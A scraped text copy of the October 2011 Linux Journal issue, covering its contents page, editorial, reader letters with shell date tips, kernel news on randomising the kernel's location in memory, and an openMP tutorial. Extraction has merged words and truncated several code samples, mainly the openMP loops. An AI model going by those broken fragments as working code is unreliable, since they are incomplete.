21.07.2015 Views

Linux Journal | October 2011 | Issue 210

Linux Journal | October 2011 | Issue 210

Linux Journal | October 2011 | Issue 210

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

COLUMNS24 Reuven M. Lerner’s At the ForgeMustache.js32 Dave Taylor’s Work the ShellWorking with Image Files36 Kyle Rankin’s Hack and /Practice Hacking on Your Home Router118 Doc Searls’ EOF<strong>Linux</strong> Is LatinREVIEW54 Return to Solid StateKyle RankinINDEPTH98 Remote Viewing—Not Just aPsychic Power<strong>Linux</strong> is a great desktop OS, even whenthe desktop is on another continent.Joey Bernard104 Packet Sniffing BasicsTo keep your data safe, the best defenseis knowing what you can lose, how it canget lost and how to defend against it.Adrian Hannah110 Python in the CloudTame the cloud with Python.Adrian KlaverIN EVERY ISSUE8 Current_<strong>Issue</strong>.tar.gz10 Letters14 UPFRONT42 New Products46 New Projects36 PRACTICE HACKING ON YOUR HOME ROUTER117 Advertisers IndexON THE COVER• Keep Your Data Safe on Public Networks, p. 104• Hack Your Home Router, p. 36• ipset for Advanced Firewall Configuration, p. 62• tcpdump—the Powerful Network Analysis Utility, p. 9049 SINFO• Deploy a Scalable and High-Performing Distributed Filesystem with Lustre, p. 80• Reviewed: Intel’s 320 SSD Line, p. 54LINUX JOURNAL (ISSN 1075-3583) is published monthly by Belltown Media, Inc., 2121 Sage Road, Ste. 310, Houston, TX 77056 USA. Subscription rate is $29.50/year. Subscriptions start with the next issue.WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 5


Subscribe to<strong>Linux</strong> <strong>Journal</strong>Digital Editionfor only$2.45 an issue.Executive EditorSenior EditorAssociate EditorArt DirectorProducts EditorEditor EmeritusTechnical EditorSenior ColumnistSecurity EditorHack EditorVirtual EditorJill Franklinjill@linuxjournal.comDoc Searlsdoc@linuxjournal.comShawn Powersshawn@linuxjournal.comGarrick Antikajiangarrick@linuxjournal.comJames Graynewproducts@linuxjournal.comDon Martidmarti@linuxjournal.comMichael Baxtermab@cruzio.comReuven Lernerreuven@lerner.co.ilMick Bauermick@visi.comKyle Rankinlj@greenfly.netBill Childersbill.childers@linuxjournal.comContributing EditorsIbrahim Haddad • Robert Love • Zack Brown • Dave Phillips • Marco Fioretti • Ludovic MarcottePaul Barry • Paul McKenney • Dave Taylor • Dirk Elmendorf • Justin RyanProofreaderGeri GaleENJOY:Timely deliveryOff-line readingPublisherGeneral ManagerAdvertising Sales RepresentativeAssociate PublisherWebmistressAccountantCarlie Fairchildpublisher@linuxjournal.comRebecca Cassityrebecca@linuxjournal.comJoseph Torresads@linuxjournal.comMark Irgangmark@linuxjournal.comKatherine Druckmanwebmistress@linuxjournal.comCandy Beauchampacct@linuxjournal.comEasy navigationPhrase searchand highlightingAbility to save, clipand share articlesEmbedded videosAndroid & iOS apps,desktop ande-Reader versionsSUBSCRIBE TODAY!<strong>Linux</strong> <strong>Journal</strong> is published by, and is a registered trade name of,Belltown Media, Inc.PO Box 980985, Houston, TX 77098 USAEditorial Advisory PanelBrad Abram Baillio • Nick Baronian • Hari Boukis • Steve CaseKalyana Krishna Chadalavada • Brian Conner • Caleb S. Cullen • Keir DavisMichael Eager • Nick Faltys • Dennis Franklin Frey • Alicia GibbVictor Gregorio • Philip Jacob • Jay Kruizenga • David A. LaneSteve Marquez • Dave McAllister • Carson McDonald • Craig OdaJeffrey D. Parent • Charnell Pugsley • Thomas Quinlan • Mike RobertsKristin Shoemaker • Chris D. Stark • Patrick Swartz • James WalkerAdvertisingE-MAIL: ads@linuxjournal.comURL: www.linuxjournal.com/advertisingPHONE: +1 713-344-1956 ext. 2SubscriptionsE-MAIL: subs@linuxjournal.comURL: www.linuxjournal.com/subscribePHONE: +1 818-487-2089FAX: +1 818-487-4550TOLL-FREE: 1-888-66-LINUXMAIL: PO Box 16476, North Hollywood, CA 91615-9911 USALINUX is a registered trademark of Linus Torvalds.


2U Appliance:You Are the CloudExpansionShelvesAvailableStorage. Speed. Stability.With a rock-solid FreeBSD® base, Zettabyte File System (ZFS)support, and a powerful Web GUI, TrueNAS pairs easy-to-manageFreeNAS software with world-class hardware and support foran unbeatable storage solution. In order to achieve maximumperformance, the TrueNAS 2U System, equipped with the Intel®Xeon® Processor 5600 Series, supports Fusion-io’s Flash MemoryCards and 10 GbE Network Cards. Titan TrueNAS 2U Appliancesare an excellent storage solution for video streaming, file hosting,virtualization, and more. Paired with optional JBOD expansionunits, the TrueNAS System offers excellent capacity at anaffordable price.For more information on the TrueNAS 2U System, or to requesta quote, visit: http://www.iXsystems.com/TrueNAS.CloneSnapshotAll VolumesKEY FEATURES:. Supports One or Two Quad-Core or Six-Core, Intel® Xeon® Processor 5600 Series. 12 Hot-Swap Drive Bays - Up to 36TB ofData Storage Capacity*. Periodic Snapshots Feature Allows You toRestore Data from a Previously GeneratedSnapshot. Remote Replication Allows You to Copy aSnapshot to an Offsite Server, forMaximum Data Security. Up to 4.48TB of Fusion-io Flash Memory. 2 x 1GbE Network interface (Onboard) +Up to 4 Additional 1GbE Ports or Single/Dual Port 10 GbE Network CardsJBOD expansion is available on the2U System* 2.5” drive options available; pleaseconsult with your Account ManagerCreate Periodic SnapshotCall iXsystems toll free or visit our website today!1-855-GREP-4-IX | www.iXsystems.comIntel, the Intel logo, Xeon, and Xeon Inside are trademarks or registered trademarks of Intel Corporation in the U.S. and/or other countries.


Current_<strong>Issue</strong>.tar.gzSHAWN POWERSSneakerNets andBNC TerminatorsIfirst started my sysadmin career aboutthe time in history when 10BASE2 wasbeginning to see widespread adoption.ThinNet, as it also was called, meant anaffordable transition from the SneakerNetso many businesses used. (SneakerNet isa term for walking floppy disks back andforth between computers—not really anetwork, but it’s how data was moved.)Anyone who remembers those years knowsThinNet was extremely vulnerable tosystem-wide failures. A single disconnect(or stolen BNC terminator cap at the endof the chain) meant the entire networkwas down. That was a small price to payfor such inexpensive and blazing-fastspeed. 10Mbit was the max speed ThinNetsupported, but who in the world everwould need that much throughput?Networking has changed a lot since mycareer started, and it’s issues like this onethat keep me up to date. Kyle Rankin startsoff with a hacking primer using an off-theshelfhome router. This isn’t merely theold WRT54G hacks you’re used to readingabout. Instead, Kyle shows us how to donour black hats and really hack in to a D-Linkwireless 802.11n router. If Kyle’s hackingtutorial makes you a little nervous, don’tworry; we have some network security thismonth as well. Henry Van Styn teachesus some advanced firewall configurationswith ipset. Granted, firewalls won’t protectanyone from PHP vulnerabilities, but theystill help me sleep better at night.Mike Diehl switches gears, and insteadof showing how to hack (or protect) thenetwork, he describes how to create.Specifically, he explains how to createnetwork programs that are cross-platformand easy to build with ENet. As someonewhose programming skills peaked with 10GOTO 10, Mike’s idea of “easy” might berelative, but he gives coding examples, soeven copy/paste programmers can join in.Henry Van Styn has another article in thisissue on how to use tcpdump to troubleshootnetwork issues effectively. If you’re in chargeof a large network, you owe it to yourselfto polish your tcpdump skills. It’s a tool8 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


CURRENT_ISSUE.TAR.GZIf you’re in charge of a large network, you oweit to yourself to polish your tcpdump skills.every network administrator needs, andHenry takes some of the mystery out of it.Adrian Hannah follows in a one-two punchteaching us how to sniff packets effectively.Packet sniffing is one of those skills that canbe used for good and evil both, but we’llassume you’ll use your powers for good. Atthe very least, you’ll understand what sort ofinformation is available on your network soyou can try to secure it a bit.Networking also has made so many otherfacets of computing possible. If it weren’tfor networking, we wouldn’t have cloudcomputing. Adrian Klaver shows how touse Python to work with Amazon WebServices. For some of you, cloud computingis scary, because you never get to accessthe computer you’re working on directly.One way to help alleviate the concernof working on computers far away is toimplement remote viewing. Joey Bernardcovers several methods for accessing acomputer remotely, whether it’s in the nextroom or on the next continent. Granted,that doesn’t work for cloud-based services,but it does for remotely hosted servers, soit’s an article you’ll want to check out.Our networks are even home tofilesystems nowadays, and Petros Koutoupisshows how to deploy the Lustre distributedfilesystem. Utilizing multiple nodes for filestorage is a great way to leverage yournetwork resources for speed and redundancy.Regardless of your network speed, however,data will travel only as quickly as the harddrive underneath will send it. Kyle Rankinreviews the Intel 320 series SSD this month.If you haven’t taken the plunge to SSD, afterreading about his results, you might decidethat now is the time.And, of course, for those of you whothink networking is good only for accessingyour e-mail, we have articles for you thismonth too. Programmers will like ReuvenM. Lerner’s article about his mustache—more specifically, Mustache.js, a JavaScripttemplating system that might be right upyour alley. Dave Taylor shows us scriptershow to manipulate image files without everleaving the command line. There’s nothingwrong with firing up The GIMP to edit agraphic file, but sometimes you just want toscale an image quickly. Dave explains how.We’ve also got new product debuts, <strong>Linux</strong>news and interesting things I’ve stumbledacross this month in the UpFront section. Sowhether you’re carrying this issue aroundon a Flash drive (SneakerNet anyone?) ordownloading it wirelessly from the wirelessrouter you just hacked, we hope you enjoy it.We certainly enjoyed making it.■Shawn Powers is the Associate Editor for <strong>Linux</strong> <strong>Journal</strong>. He’salso the Gadget Guy for <strong>Linux</strong><strong>Journal</strong>.com, and he has aninteresting collection of vintage Garfield coffee mugs. Don’t lethis silly hairdo fool you, he’s a pretty ordinary guy and can bereached via e-mail at shawn@linuxjournal.com. Or, swing bythe #linuxjournal IRC channel on Freenode.net.WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 9


lettersFun withDays andDatesI always enjoylearning tricksfrom DaveTaylor’s Workthe Shellcolumn, andI understandthatsometimes theexample problems need to be somewhatcontrived to fit within an article.However, I think he might be thinkingtoo hard about how to determine the dayof the week for a date in the past. I use thissimple one-liner:$ date -d "7/20/1969" +"%a"SunYou also can use %w for a numeric 0–6answer:$ date -d "7/20/1969" +"%w"0I also use a variant of this command toconvert from “seconds since epoch”,which often is found in log files, to amore readable date format:$ date -d @1234567890Fri Feb 13 18:31:30 EST 2009As always, thanks for the tips, Dave.I hope you enjoy these in return.—AlanDave Taylor replies: Thanks for themessage. The problem is that not all versionsof <strong>Linux</strong> have this more sophisticated datecommand. I’m old-school. I have no problemwith long, complicated solutions anyway.Calendar CalculationI have been reading Dave Taylor’s commandlinecolumn (Work the Shell) in <strong>Linux</strong> <strong>Journal</strong>for some time, and I think that, although hiscommand-line solutions are, in many ways,quite useful, it looks like he seems to havesome problems with creating algorithms tosolve the core portion of the problems.For example, I have no problem with hisparsing of the input, or loop controls, inthe calendar program, but I think I havecome up with a much more effective solutionto the portion of the problem relatedto the determination of the year, by lookingat the problem in a different way.I examined the problem and decided thatyou don’t actually need to search for the dayin the calendar itself, in order to determinewhere it is in its week. All you need to knowis what day of the week it will fall on, if youlook at the calendar of the given month.To do this, you can examine a generic10 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


[ LETTERS ]month and, from that, determine where inthe week the month begins. So, I came upwith the following solution.Given: 1) month in which event occurred(month), 2) day of month on which eventoccurred (dom), 3) day of week on which$dom occurred (dow). Find: year in which$dom occurred on $dow, in $month (year).1. Label the days of the week as follows:Sun = 6, Mon = 5, ..., Fri = 1, Sat = 0.2. Assign the value for dow, using theappropriate value, from above.3. Calculate how many days will be in thefirst week of the target month:days=$(( $(( $dom + $dow - 1 )) % 7 + 1 ))Now, you know how many days are in thefirst week of this calendar month, in thetarget calendar year ($days).So, you can find out if the test monthmatches this value, like this (well, not really,but if you compare the two values, this willtell if you’ve found the right year). Also,this awk script is predicated on the factthat cal has its first line of days on the thirdline of its output (FNR == 3):cal $month $year | awk "FNR == 3 { print NF }"If this value equals $days, then thecurrent value of $year is the correctyear; otherwise, you will have to loop,decrementing $year (by one) at eachiteration, until the value for $year is correct.My version of the loop looks like this.Please see if you can make it better! Specifically,I ended up having to create anothervariable, $caldays (calendar days, thenumber of days in the first week of the testmonth). Notice that in order to make eventhis work, I had to enclose the entire thingin backticks, or I got errors:while true ; docaldays=`cal $month $year | awk "FNR == 3 { print NF }"`if [ $caldays -eq $days ] ; thencal $month $yearexit 0 # non-error exitLow Cost Panel PCPDX-089Tl Vortex86DX 1 GHz Fanless CPUl Low Power Consumptionl 1 RS232/422/485 serial portl Mini-PCI Expansion slotl 2 USB 2.0 Host Portsl 10/100 BaseT Ethernet & Audiol PS/2 mouse & keyboardl CompactFlash & MicroSD card socketsl Resolution/Colors: 1024 x 600 @ 256Kl Resistive Touch Screenl Free EMAC OE <strong>Linux</strong>l Free Eclipse IDE2.6 KERNELSetting up a Panel PC can be a Puzzling experience. However, the PDX-089Tcomes ready to run with the Operating System installed on flash disk. Applypower and watch the <strong>Linux</strong> X-Windows desktop user interface appear on the vividcolor LCD. Interact with the PDX-089T using the responsive integratedtouchscreen. Everything works out of the box, allowing you to concentrate onyour application rather than building and configuring device drivers. Just Write-Itand Run-It... . Since 1985OVER24YEARS OFSINGLE BOARDSOLUTIONS EQUIPMENT MONITOR AND CONTROLPhone: (618) 529-4525 · Fax: (618) 457-0110 · www.emacinc.comWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 11


[ LETTERS ]elseyear=$(( $year - 1 ))fidoneonly 30 days; Feb has 28 (or 29, in leap years)days, and the rest have 31 days, but I knowyou already knew that.—Dave JohnsonBy the way, the most years you will needto go back is ten (except, of course, when$month=February and $dom=29, in whichcase, you may have to go back significantlyfarther, as this condition can occur only in ayear divisible by four ($year %4 -eq 0))!Also, this version of the program actuallyprints the calendar for the target month(cal $month $year). I just realized thatthis script does not check to make certainthat the month actually contains $dom, butthat realistically should be checked beforesearching for the existence of the target date,else the input data is/are invalid—that is,September, April, June and November haveDave Taylor replies: Thanks for your noteand interesting solution. As with any script,there are a number of different solution paths.What I’m really trying to illustrate in my Workthe Shell column is the “solution journey”more than how to find and implement theoptimal algorithm. I knew from the get-gothat there were better mathematical formulasI could use, and indeed, one colleague hasassured me that there’s a mathematicalformula that will solve this puzzle withoutany invocations of cal or anything like that.I’m unable to find it with Google, but that’sanother story. In any case, thanks for yoursmart and interesting solution!TECH TIPBy combining three useful command-line tools (less, watch and xdotool) along with two xtermwindows, you can create an automatically scrolling reader.Say you have a good book in text-file form (“book.txt”) that you just downloaded from Project Gutenberg.Open one xterm and do the usual thing you do when you want to read that book with less:$ less book.txtLook at the first few characters in the title line of that xterm’s window. (In mine, it was bzimmerly@zt,which is my user ID and the name of the machine I was working on.)Open another xterm, issue this command, and watch (pun intended) the magic:$ watch -n 1 xdotool search --name bzimmerly@zt key ctrl+mThe watch command will (every second) issue a “Return” (Ctrl-m) keystroke to the window thathas “bzimmerly@zt” as a title, and it will stop only when you interrupt it with Ctrl-c! I think this isneato daddyo! (What can I say? I’m a child of the ’60s!)—BILL ZIMMERLY12 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


[ LETTERS ]Correction to LettersIn the Letters section in the September <strong>2011</strong> issue, theLetter titled “What Day Is It?”, and the script providedtherein, was written by Peter Ljubic (not Eric Miller). Weapologize for the error.—Ed.Correction to “<strong>Linux</strong> Standard Base: State of Affairs”In our article, “<strong>Linux</strong> Standard Base: State of Affairs”, in theAugust <strong>2011</strong> issue, one of our timeline graphics reportedthe addition of Java to LSB 4.0, without mentioning that itwas added as a “trial-use” standard (proposed for inclusion,but not required). We regret the error.—Jeff Licquia<strong>Linux</strong> in the WildAt Your ServiceSUBSCRIPTIONS: Beginning with theSeptember <strong>2011</strong> issue, subscriptions to<strong>Linux</strong> <strong>Journal</strong> will be fulfilled digitally andwill be available in a variety of digitalformats, including PDF, an on-line digitaledition, and apps for iOS and Android deviceswill be coming soon. Renewing yoursubscription, changing your e-mail addressfor issue delivery, paying your invoice,viewing your account details or othersubscription inquiries can be done instantlyon-line: www.linuxjournal.com/subs.Alternatively, within the US and Canada,you may call us toll-free at 1-888-66-LINUX(54689), or internationally at +1-818-487-2089. E-mail us at subs@linuxjournal.com or reach us via postal mail at <strong>Linux</strong><strong>Journal</strong>, PO Box 16476, North Hollywood,CA 91615-9911 USA. Please remember toinclude your complete name and addresswhen contacting us.LETTERS TO THE EDITOR: We welcomeyour letters and encourage you to submitthem at www.linuxjournal.com/contactor mail them to <strong>Linux</strong> <strong>Journal</strong>, PO Box980985, Houston, TX 77098 USA. Lettersmay be edited for space and clarity.WRITING FOR US: We always are looking forcontributed articles, tutorials and real-worldstories for the magazine. An author’s guide,a list of topics and due dates can be foundon-line: www.linuxjournal.com/author.This was me, not too long ago, over Aptos, California (MontereyBay), near my home. It was my fourth tandem jump, but whenI went back and looked at the pics, I thought “this should be inLJ!” It’s my favorite LJ shirt, “May the source be with you”.—Rob PolkWRITE LJ A LETTER We love hearing from our readers. Please send usyour comments and feedback via www.linuxjournal.com/contact.FREE e-NEWSLETTERS: <strong>Linux</strong> <strong>Journal</strong>editors publish newsletters on both aweekly and monthly basis. Receive latebreakingnews, technical tips and tricks,an inside look at upcoming issues andlinks to in-depth stories featured onwww.linuxjournal.com. Subscribe for freetoday: www.linuxjournal.com/enewsletters.ADVERTISING: <strong>Linux</strong> <strong>Journal</strong> is a greatresource for readers and advertisers alike.Request a media kit, view our currenteditorial calendar and advertising due dates,or learn more about other advertising andmarketing opportunities by visiting uson-line: www.linuxjournal.com/advertising.Contact us directly for further information:ads@linuxjournal.com or +1 713-344-1956ext. 2.WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 13


UPFRONTNEWS + FUNdiff -uWHAT’S NEW IN KERNEL DEVELOPMENTLinus Torvalds has decided at last to release<strong>Linux</strong> version 3.0. For a long time, it seemedas though he might never bump the majorversion number, because there was no longerany meaning associated with that number.And, indeed, his explanation for the changenow ran something along the lines of, <strong>Linux</strong> isentering its third decade, so why not?Along with the version bump, Linus hasdecided to do away with the whole threenumberedversioning system that the kernelhas used since time immemorial. So from nowon, it’ll just be 3.0, 3.1, 3.2 and so on.This is great news for the stable treemaintainers, who were getting tired ofversion numbers like 2.6.38.4, which asWilly Tarreau said, look more like IPnumbers than version numbers.But, with the kernel going from a threenumberedsystem to a two-numbered system,a lot of support scripts are breaking. It’s <strong>Linux</strong>’sown Y2K bug. Everyone thought 2.6 wasgoing to be the prefix for the rest of time andwrote their scripts accordingly. So along withthe version number changes, a lot of fixes aregoing into the various support scripts.As soon as the rumor started floatingaround, Joe Pranevich emerged froma seven-year absence, to announce the“Wonderful World of <strong>Linux</strong> 3.0” atwww.kniggit.net/wwol30. It covers thevast array of changes that occurred throughoutthe 2.6 time frame, leading up to 3.0.Matt Domsch announced that Dell wasdiscontinuing the digest forms of the linuxkerneland linux-scsi mailing lists. Althoughthis would affect a few hundred subscribers,he said that changes at the hardware andsoftware level of their mail servers meant thatcertain features wouldn’t be re-implemented,and digests were one of those.Dan Rosenberg initiated a fascinatingdiscussion about a particular security problem:how to deal with attackers who based theirattacks on knowing the location, in RAM, ofvulnerable parts of the kernel.His original idea was to have the system migratethe kernel to a new randomized memory locationduring boot. But over the course of discussion, itturned out there were many hard problems thatwould have to be solved in that case.For one thing, it wasn’t always clear whereto get enough entropy for random numbergeneration—an important issue if one wants torelocate the kernel to a random place in RAM.Also, the 64-bit kernel would load into memoryin a different way from the 32-bit kernel, andso it would have to be handled differentlyby Dan’s code. Also, if the kernel were in arandom location, something would have to bedone to oops report generation to make surethe memory references would make sense to14 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


[ UPFRONT ]someone reading them. Even more dangerouswas the fact that other parts of the systemalready would be in memory at the time thekernel was being relocated, and there was a realdanger of clobbering those parts, which wouldkill the system. Hibernation also was an issue,because the existing hibernation code in thekernel made assumptions about the awakeningsystem that Dan’s code violated.Eventually, it became clear that althoughDan’s goal was a good one—making it moredifficult to predict where in RAM the vulnerableparts of the kernel could be found—there werejust too many technical difficulties to make itfeasible in the way he was planning to do it.Linus Torvalds and H. Peter Anvin eachcame up with alternative approaches thatmight be easier to implement, while stillaccomplishing essentially the same goal.Linus’ idea was to relink the kernel binarywith a random piece of data to offset thekernel randomly in RAM that way.H. Peter’s idea was more radical. He wantedto convert the core kernel code into a set ofkernel modules. At that point, the init code couldload the various modules anywhere it wanted,even in noncontiguous RAM. So, he set out toimplement that in the syslinux bootloader.Although no clear direction emerged forwhat would ultimately go into the kernel,it seems as though a number of good ideaswill be pursued. Almost certainly, the kernel’slocation in RAM will be randomized in someway, before too long.—ZACK BROWN<strong>Linux</strong><strong>Journal</strong>.comHave you visited us at <strong>Linux</strong><strong>Journal</strong>.comlately? You might be missing out on somegreat information if you haven’t. Our on-linepublication’s frequent, Web-exclusive postswill provide you with additional tips and tricks,reviews and news that you won’t find here, somake sure to visit us regularly at <strong>Linux</strong><strong>Journal</strong>.com.In case you missed them, here are a few of themost popular recent posts to get you started:content/why-hulu-plus-sucks-and-whyyou-should-use-it-anyway■ “Fun with ethtool”: www.linuxjournal.com/content/fun-ethtool■ “Wi-Fi on the Command Line”:www.linuxjournal.com/content/wi-fi-command-line■ “Review: Recompute Cardboard PC”:www.linuxjournal.com/video/review-recompute-cardboard-pc■ “5 Myths About OpenOffice.org/LibreOffice”:www.linuxjournal.com/content/5-myths-about-openofficeorg-libreoffice■ “Why Hulu Plus Sucks, and Why You ShouldUse It Anyway”: www.linuxjournal.com/■ “The Arch Way”: www.linuxjournal.com/content/arch-way —KATHERINE DRUCKMANWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 15


[ UPFRONT ]Non-<strong>Linux</strong> FOSSMany Windows or Macintosh users are perfectlyhappy to download their podcasts with iTunes orsomething similar. Here at <strong>Linux</strong> <strong>Journal</strong>, however,we like to offer open-source alternatives. Enter Juice.Juice is a cross-platform, open-source application fordownloading podcasts.Juice is fast, efficient and very feature-rich. Ourfavorite feature is the built-in directory with thousandsof podcast feeds from which to choose. Add thingslike auto cleanup, centralized feed management andaccessibilityoptions, andyou have anawesome tool for getting your audio informationfix. Check it out for Windows, Mac OS or <strong>Linux</strong> atjuicereceiver.sourceforge.net.—SHAWN POWERSClearOSAll-in-one <strong>Linux</strong>-based network servers aren’t anew concept. Distributions like Clark Connecthave been around for many years and fit theirniche quite well. Lately, however, there seems tobe a new batch of all-in-one solutions that offer asimilar business model.A couple months ago, we reviewed Untangle,which is a commercial distribution offering afeature-limited free version. Recently, one ofour readers, Tracy Holz, pointed me to a similarproject, ClearOS. Although Untangle is largelya firewall and network services system, ClearOSattempts to do more. Using a combination ofopen-source and commercial tools, it can be aone-stop server platform for many networks.ClearOS has a unique modular system thatseamlessly includes local server applicationsand cloud-based services to end users. You canpurchase appliance devices or install ClearOS onan existing server. Much like Untangle, ClearOS’sfree features are limited, but it doesn’t feelcrippled if you stick to just the free stuff.The features and add-ons are too numerous tolist here, but if you’re looking for a commerciallybacked all-in-one server solution for your network,check out ClearOS: www.clearfoundation.com.Tell ’em Tracy sent you.—SHAWN POWERS16 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


[ UPFRONT ]Google PlusThe early years of the 21st century forever will beknown as the age of social media. I don’t knowif that’s something we should be proud of, butnonetheless, here we are. During thepast decade, we’ve seen things likeFriendster, Pownce, Twitter, Wave,Facebook, Tumblr, Buzz, Gowalla,Brightkite, Foursquare, Loopt, Plurk,Identi.ca, LinkedIn, Yammer and nowGoogle Plus.Google hasn’t had a great track record whenit comes to social networking, with both Waveand Buzz being largely unsuccessful. GooglePlus, or G+, seems to be its most appealingoffer so far. At the time of this writing, it’s stillvery early in the beta stages, but it alreadyseems to have a cleaner and simpler interfacethan its direct competitor: Facebook.Google offers unique features likegroup video chats called “hangouts”and “circles” of friends to help organizeyour following/followers. G+’s integrationwith other Google services may be thekill shot. Gmail, Picasa, YouTube andBlogger easily can be integrated directlyby Google, making it simple for those folks alreadyusing Google apps to get their Plus on. Is the thirdtime a charm for Google, or will G+ be anotherunfortunate carcass in the pile of outdated socialmedia platforms? Only time will tell.—SHAWN POWERSKickstarter for Open-Source Projects?The Web site www.kickstarter.com is an interestingplace. Basically, it’s a site that allows people to investin various projects, giving people real money todevelop an idea. Those ideas vary from film-makingto programming video games, but the concept is thesame regardless of the project.What is the motivation for investing insomeone’s idea? That’s the beauty; it depends onthe project. Maybe it’s an M.C. Frontalot albumyou want to see created, so you give money tothe project so the album is produced. Perhapsit’s a video game you’d really like to play, so yougive money to the developer to make the game.Perhaps the developer gives a copy of the gameto all investors. Perhaps not. There are no rules,just collaboration.Recently, we’ve seen open-source projects useKickstarter, and it seems like a great idea. If you seea program idea you like, send money, and if thecreators reach their goals, they’ll create the programs.Because it’s open source, the benefit is obvious: youget to use the program when it’s complete.Granted, it’s not a perfect system. It certainlywould be possible to abuse it. It seems that actuallyfunding open-source developers is a good ideathough. Perhaps this method of funding is a fad,or maybe it’s the start of something great—payingdevelopers to develop free software. If it works, itseems like everyone wins.—SHAWN POWERSWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 17


[ UPFRONT ]Big-Box ScienceA few months ago, I wrote a piece abouthow you can use MPI to run a parallelprogram over a number of machines thatare networked together. But more and moreoften, your plain-old desktop has more thanone CPU. How best can you take advantageof the amount of power at your fingertips?When you run a parallel program on onesingle machine, it is called shared-memoryparallel programming. Several optionsare available when doing shared-memoryprogramming. The most common arepthreads and openMP. This month, I take alook at openMP and how you can use it toget the most out of your box.openMP is a specification, whichmeans you end up actually using animplementation. It is implemented as anextension to a compiler. So, in order touse it in your code, you simply need toadd a compiler flag. There is no linkingin of external libraries. openMP directivesare added to your program as specialcomments. This means if you try to compileyour program with a compiler that doesn’tunderstand openMP, it should compilefine. The openMP directives will appearjust like any other comment, and you willend up with a single-threaded program.Implementations for openMP are availableunder C/C++ and FORTRAN.The most basic concept in openMP is thatonly sections of your code are run in parallel,and, for the most part, these sections all runthe same code. Outside of these sections, yourprogram will run single-threaded. The mostbasic parallel section is defined by:#pragma omp parallelin C/C++, or:!OMP PARALLELin FORTRAN. This is called a parallel openMPpragma. Almost all of the other pragmas that youare likely to use are built off this.The most common pragma you will see is theparallel loop. In C/C++, this refers to a for loop.In FORTRAN, this is a do loop. (For the rest of thispiece, I stick to C/C++ as examples. There areequivalent FORTRAN statements you can find inthe specification documentation.) A C/C++ loopcan be parallelized with:#pragma omp parallel forfor (i=0; i


this for loop should take approximately one-fourththe time it normally takes.Does this work with all for loops? No, notnecessarily. In order for the openMP subsystemto be able to divide up the for loop, it needs toknow how many iterations are involved. Thismeans you can’t use any commands that wouldchange the number of iterations around the forloop, including things like “break” or “return”in C/C++. Both of these drop you out of the forloop before it finishes all of the iterations. Youcan use a “continue” statement, however. Allthat does is jump over the remaining code inthis iteration and places you at the beginningof the next iteration. Because this preservesiteration count, it is safe to use.By default, all of the variables in your programhave a global scope. Thus, when you enter aparallel section, like the parallel for loop above,you end up having access to all of the variablesthat exist in your program. Although this is veryconvenient, it is also very, very dangerous. If youlook back at my short example, the work is beingdone by the line:area += i;You can see that the variable area is being readfrom and written to. What happens now if youhave several threads, all trying to do this at thesame time? It is not very pretty—think car pileupon the freeway. Imagine that the variable areastarts with a value of zero. Then, your programstarts the parallel for loop with five threads andthey all read in the initial value of zero. Then,they each add their value of i and save it back tomemory. This means that only one of these five


[ UPFRONT ]actually will be saved, and the rest essentially willbe lost. So, what can you do? In openMP, there isthe concept of a critical section. A critical section isa section of your code that’s protected so that onlyone thread can execute it at a time. To fix this issue,you could place the area incrementing within acritical section. It would look like this:#pragma omp parallel forfor (i=0; i


[ UPFRONT ]look like:export OMP_NUM_THREADS=4a = 10;#pragma omp parallel forprivate(a,j) firstprivate(a)for (i=0; i


They Said It“Be as smart as you can, but rememberthat it is always better to be wise than tobe smart.”—Alan Alda“Being an intellectual creates a lot ofquestions and no answers.”—Janis Joplin“Failure is simply the opportunityto begin again, this time moreintelligently.”—Henry Ford“Genius is more often found in a crackedpot than in a whole one.”—E. B. White“It’s not that I’m so smart, it’s just that Istay with problems longer.”—Albert Einstein“Man is the most intelligent of theanimals—and the most silly.”—Diogenes“The surest sign that intelligent life existselsewhere in the universe is that it hasnever tried to contact us.”—Bill Watterson


COLUMNSAT THE FORGEMustache.jsREUVEN M.LERNERLooking for a JavaScript templating system? Mustache.js mightbe right for you.The past few articles, I’ve looked at anumber of uses for JavaScript, on both theserver and the client. I hope to continue myexploration of such systems, particularly onthe client side, in the coming months.But for now, I want to tackle a moremundane problem that JavaScriptprogrammers encounter all the time: the factthat JavaScript doesn’t have any native stringinterpolationmechanism. Sure, you alwayscan use the + operator to concatenate strings:"hello, " + "world"which gives you the string:"hello, world"which is what you might expect. But, whatif you have a variable "username", andyou want to say “hello” to the user in afriendly way? In Ruby, you would use:"hello, #{username}"And in Python, you would write:"hello, %s" % usernameBut in JavaScript, you’re basically stucktyping:"hello, " + usernamewhich isn’t so terrible if you have one variableat the end of the string. But the more I’mworking with JavaScript, the more I’d like tohave more sophisticated string interpolation.While I’m wishing, I’d like to have allsorts of text-formatting and templatingcapabilities that I’m used to from otherlanguages or from various Web frameworks.Now, this doesn’t sound like a tall order.And heaven knows, I’ve used a lot oftemplating systems during the years, so Iknow that it’s not very hard to create one—especially if the standards aren’t very high.But as Web applications become more heavilyfocused on the browser, and on JavaScript,you’ll need a templating solution that allowsyou to work easily in that environment.Fortunately, several templating systemsexist. One of the most prominent andinteresting is Mustache.js, a JavaScriptimplementation of the Mustachetemplating system that is available for manydifferent languages. In contrast with most24 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


